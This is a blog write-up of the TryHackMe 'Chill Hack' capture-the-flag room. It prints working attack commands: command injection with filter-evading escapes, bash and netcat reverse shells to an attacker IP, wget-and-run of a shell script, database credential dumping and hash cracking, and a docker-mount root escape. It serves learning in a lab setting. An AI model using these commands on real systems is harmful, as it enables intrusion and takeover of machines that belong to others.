Challenges: Chill Hack (TryHackMe)


The Chill Hack machine on TryHackMe is an easy-level CTF focused on web exploitation, privilege escalation, and creative command injection techniques. The challenge starts with a seemingly harmless website, but deeper inspection reveals vulnerable PHP code that allows for command execution. From there, privilege escalation is achieved by abusing a misconfigured script, leading to root access. This room is a good practice in RCE exploitation, bypassing command filters, and Linux privilege escalation methods.
Investigate!
Chill the Hack out of the Machine.
Easy level CTF. Capture the flags and have fun!
Answer the questions below
- User Flag
We started by scanning the target machine with:
nmap -sV IP_Address
and enumerating web directories:
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt
One interesting path discovered was /secret/
. Visiting it revealed an unusual behavior where adding $(echo ls)
in the URL triggered an execution response.
Checking the site: http://IP_Address/secret/
$(echo ls)
$(echo cat\ index.php)
This, among other commands, displays ‘Are you a hacker?’ in red.
Viewing the source code showed a suspicious comment: <!—?php echo shell_exec($cmd);?—>
. I tried to research what this would mean on ChatGPT:
<!--?php echo shell_exec($cmd);?-->
🔸 This is a commented-out PHP line, but some servers misinterpret or ignore malformed comments, so shell_exec($cmd)
may still get executed, especially if this is inside an eval or obfuscated logic.
🔸 The command is probably being passed from a query string, like:
http://<ip>:<port>/index.php?cmd=ls
This indicated the page might be executing commands from a query string. Testing with:
/index.php?cmd=ls
/index.php?cmd=cat%20index.php
/index.php?cmd=whoami
🧠 Why You're Seeing “Are you a hacker?”
Because this line:
<h1 style="color:red;">Are you a hacker?</h1>
...is just static content inside the index.php
. It's reprinted every time the page reloads, which makes sense after triggering your new shell.
✅ Confirm Functionality
Try this:
/index.php?cmd=ls%20-la
/index.php?cmd=cat%20/etc/passwd
If it works, then:
💥 You have Remote Code Execution (RCE) via shell_exec() from a GET parameter!
ftp IP_Address
get note.txt
cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
uname -a
Linux ip-10-10-167-107 5.15.0-138-generic #148~20.04.1-Ubuntu SMP Fri Mar 28 14:32:35 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
We got a shell as www-data
.
Checking sudo -l
revealed a script executable by another user (apaar
):
sudo -l
Matching Defaults entries for www-data on ip-10-10-167-107: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ip-10-10-167-107: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
$(echo cat\ /home/apaar/.helpline.sh)
#!/bin/bash echo echo
"Welcome to helpdesk. Feel free to talk to anyone at any time!" echo read -p "Enter the person whom you want to talk with: " person read -p "Hello user! I am $person, Please enter your message: " msg $msg 2>/dev/null echo "Thank you for your precious time!”
$(echo sudo\ -u apaar /home/apaar/.helpline.sh)
sudo -u apaar /home/apaar/.helpline.sh
echo -e "someone\\nid" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! uid=1001(apaar) gid=1001(apaar) groups=1001(apaar) Thank you for your precious time!
echo -e "bash -i >& /dev/tcp/..."
e bash -i >& /dev/tcp/...
Privilege Escalation
While exploring, we found a note mentioning command filtering. Some words like rm
or cat
were blocked, but escaping them (e.g., r\m
or c\at
) bypassed the filter. This allowed us to upload a reverse shell:
echo -e "anyone\\n/bin/sh" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
echo '/bin/bash -i >& /dev/tcp/10.10.196.78/4444 0>&1' > [
shell.sh
](http://shell.sh)` python3 -m http.server 80`
Are you a hacker, red alert
and on the target:
echo -e "anyone\\nwget <
http://10.10.65.21/shell.sh
> -O /tmp/
shell.sh
" | sudo -u apaar /home/apaar/.
helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
echo -e "anyone\\nbash /tmp/
shell.sh
" | sudo -u apaar /home/apaar/.
helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false apaar:x:1001:1001:,,,:/home/apaar:/bin/bash anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin systemd-timesync:x:113:116:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin tss:x:114:119:TPM software stack,,,:/var/lib/tpm:/bin/false tcpdump:x:115:120::/nonexistent:/usr/sbin/nologin usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin fwupd-refresh:x:117:121:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin ubuntu:x:1003:1004:Ubuntu:/home/ubuntu:/bin/bash
Start a Netcat listener on port 4444:
nc -lvnp 4444
On the site, use the command below once you’ve opened netcat at port 4444. Replace the attack_machine_IP
and PORT
r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack_machine_IP> <PORT> >/tmp/f
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attack_machine_IP PORT > /tmp/f
Obfuscating commands like r\m and c\at was genius — it evaded the WAF (Web Application Firewall) or whatever filter was flagging classic patterns and keywords.
This script executed user input unsafely, enabling us to inject commands and upgrade to the apaar
user:
Had to try to pass the right message over and over the next one worked well and eventually the flag was revealed:
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: /bin/sh
/bin/sh
Hello user! I am /bin/sh, Please enter your message: /bin/sh /
bin/sh
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar) python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' apaar@ip-10-10-141-164:~$ pwd
pwd /home/apaar
apaar@ip-10-10-141-164:~$ cat local.txt
Root Flag
Root Access
ssh-keygen -f apaar
ssh-keygen -f apaar Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in apaar Your public key has been saved in apaar.pub The key fingerprint is: SHA256:qMval/CvZzYne1OvtaoSOE8ZU09mIe0IK3iK4NKo7Cg apaar@ip-10-10-141-164 The key's randomart image is: +---[RSA 3072]----+ | .... | | . ..= | | . + B | |. . o.+ . o | |.+ . o.oS+ | |o.o o.o + . | |+ .o = . . .. | |E. o .+ O + ... | |+...+..*oB.ooo. | +----[SHA256]-----+ apaar@ip-10-10-141-164:~$ `ls` ls apaar apaar.pub local.txt apaar@ip-10-10-141-164:~$ `cat apaar.pub`
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKn82UJyZHR8vL/QDoDONnBPYqDXLpioIJzzgImTl25Zad0K8WwIY63v+o5rudtp99mkOOAOaveDEXsb1X3qrnv8n7ZL5JVdvdgo690VQ5M4oPNX+Whdmr+wVEK19MYCKV1HdqChGMifuM8gVzSjRmpUsECI8mQF2ERc2OUlIysxYfP0w4OCLORvXynzyvlYoP8UR4DqzQPCWeg7TntfMtE4m5oY1Dzlqk4dvoLHFpxHg+FGUSLCnbzN92K37nE0W05yoCg/qjsCvTXk3dql7GhNSD0/gpeHtujdsB3hPs4Q016gtPqqX7dX0xdiHW8ky2UBk//zV+j4izu/bghEu10C1D8CyEfd56jLCxHfeRE2v0IsYsQp445xG7Q7Db3CHL74FNobGV2M+P1kVaz3c1myy6n3jAn4iEgZRC05pOYlEduSHuglsNEdZ4HcT7bLAUHYgJK9S7JLZtu70MEy2QwbGcn+zSS3xqCwYFf2XztJbyCnOrf3HmJrVVFzofLpM= apaar@ip-10-10-141-164
In the next step had to use linpeas.sh
find / -type f -name linpeas.sh 2>/dev/null
/opt/PEAS/linPEAS/linpeas.sh
$PASSWORDTRY
<html> <body> <?php if(isset($_POST['submit'])) { $username = $_POST['username']; $password = $_POST['password']; ob_start(); session_start(); try { $con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db"); $con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING); } catch(PDOException $e) { exit("Connection failed ". $e->getMessage()); } require_once("account.php"); $account = new Account($con); $success = $account->login($username,$password); if($success) { header("Location: hacker.php"); } } ?> <link rel="stylesheet" type="text/css" href="style.css"> <div class="signInContainer"> <div class="column"> <div class="header"> <h2 style="color:blue;">Customer Portal</h2> <h3 style="color:green;">Log In<h3> </div> <form method="POST"> <?php echo $success?> <input type="text" name="username" id="username" placeholder="Username" required> <input type="password" name="password" id="password" placeholder="Password" required> <input type="submit" name="submit" value="Submit"> </form> </div> </div> </body> </html>
With user-level access, we searched for credentials and found a database password inside a PHP file:
!@m+her00+@db
mysql -h localhost -uroot -p
Enter password:
mysql>
show databases;
mysql>USE webportal;
mysql>
SELECT * FROM users;
mysql> SELECT * FROM users; SELECT * FROM users; +----+-----------+----------+-----------+----------------------------------+ | id | firstname | lastname | username | password | +----+-----------+----------+-----------+----------------------------------+ | 1 | Anurodh | Acharya | Aurick | 7e53614ced3640d5de23f111806cc4fd | masterpassword | 2 | Apaar | Dahal | cullapaar | 686216240e5af30df0501e53c789a649 | dontaskdonttell +----+-----------+----------+-----------+----------------------------------+ 2 rows in set (0.00 sec)
Use a Rainbow table like Crackstation to get the actual password
cd /var/www/html/secret
id
docker run -v /:/mnt —rm -it alpine chroot /mnt sh
# whoami
# ls -la
Using it to log in to MySQL exposed usernames and hashes, which, when cracked, provided additional credentials. Eventually, we identified an SSH key reuse issue, generated a new key pair, and escalated to root. The final flag was retrieved from /root/proof.txt
.
cat proof.txt
Among all challenges I’ve done this was one of the most challenging ones. These resources came in handy while researching alongside ChatGPT:
https://medium.com/@saul_x0/chill-hack-write-up-tryhackme-11c72e126197
https://medium.com/@Inching-Towards-Intelligence/thm-chill-hack-19-100-44a59fbedc25
This challenge demonstrates how small vulnerabilities like improperly handled command input (shell_exec($cmd)
) can lead to full system compromise when combined with insecure scripts and weak credentials. It reinforces the importance of validating and sanitizing user inputs, implementing strict least-privilege principles, and restricting sensitive files and scripts. For learners, it’s an excellent example of chaining web exploitation with privilege escalation to achieve complete compromise.
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.